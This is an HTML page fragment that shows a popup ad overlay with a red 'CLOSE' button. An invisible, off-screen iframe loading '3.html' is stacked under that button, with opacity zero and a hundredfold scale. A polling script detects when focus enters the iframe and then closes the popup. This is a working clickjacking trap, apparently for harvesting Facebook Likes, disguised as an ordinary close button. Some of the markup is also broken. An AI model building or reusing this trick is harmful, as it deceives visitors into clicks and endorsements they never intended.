
<html>
	<head>
		<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>

 <script type="text/javascript">
 jQuery(document).ready(function($){
 {
 $('#popupwindow').delay(1000).fadeIn('medium');

 $('#imagepopup, #fb-like').click(function(){
 $('#popupwindow').stop().fadeOut('medium');
 });
 }
 check1();
 });

 var check1 =function(){
 if(document.activeElement.parentNode && document.activeElement.parentNode.id=="fb-like")
 $("#fb-like").trigger("click");
 else
 setTimeout("check1()", 1000);
 }
 </script>
 <style>
 #popupwindow {
 display:none;
 background:rgba(0,0,0,0.6);
 width:100%;
 height:100%;
 position:fixed;
 top:0;
 left:0;
 z-index:99999;
 }
 #backgroundsetting {
 width:420px;
 height:230px;
 position:relative;
 background:#ffffff;
 top:2%;
 left:2%;
 margin:0px auto;
 }
 #imagepopup {
 cursor:pointer;
 background: #F41515;
 height:10px;
 width:90px;
 margin-top:0px;
 margin-left:63px;
 position:absolute;
 overflow: hidden;
 text-align: center;
 font-size: 44px;
 padding: 30px;
 font-weight: bold;
 color: #FFF;
 }
 #taboola-exit-popup-thumbnails{
 width:400px;
 margin-top:0px;
 }
 @media (max-width:600px){
 #backgroundsetting{
 width: 84%;
 margin: 0 8%;
 left: 0;
 }
 #taboola-exit-popup-thumbnails{
 width:100%;
 }
 #imagepopup{
 width: calc(100% - 40px);
 margin: 20px 20px;
 }
 }

 @media (max-width:1160px){
 .single{
 width:100%;}
 .sidebar{
 display: none;}
 .content{
 width: 100%;}
 }
 

</style>





 <div id="popupwindow" style="display: block;">
 <div id="backgroundsetting">
 <div align="center" style="padding: 20px;">
 <!-- <script type="text/javascript">
 //<![CDATA[
 LSM_Slot({
 adkey: 'ac2',
 ad_size: '300x250',
 slot: 'slot128113'
 });
 //]]>
 </script>-->
 <div id="taboola-exit-popup-thumbnails" class=" trc_related_container trc_spotlight_widget trc_elastic trc_elastic_trc_67839 ">


<h2><span style="color: #000000;"><strong><span style="text-decoration: underline;">





</div>
 <script type="text/javascript">
 window._taboola = window._taboola || [];
 _taboola.push({
 mode: 'thumbnails-c',
 container: 'taboola-exit-popup-thumbnails',
 placement: 'Exit Popup Thumbnails',
 target_type: 'mix'
 });
 </script> </div>
 <div id="imagepopup">
 <p style="font-size:80%;margin-top:0px;"> CLOSE</p>
<div id="fb-like" style="position:absolute;left:-3000px;top:-1000px">
				<iframe src="3.html" scrolling="no" frameborder="0" style="opacity:0;filter:alpha

(opacity=0);border:none; overflow:hidden; transform: scale(100);-ms-transform: scale(100);-webkit-transform: scale(100);-o-transform: scale(100); -moz-

transform: scale(100);transform-origin: top left;-ms-transform-origin: top left;-webkit-transform-origin: top left;-moz-transform-origin: top left;width:width="40" 

height="20";-webkit-transform-origin: top left;" allowTransparency="true"></iframe>
			</div>
 </div>
 </div>


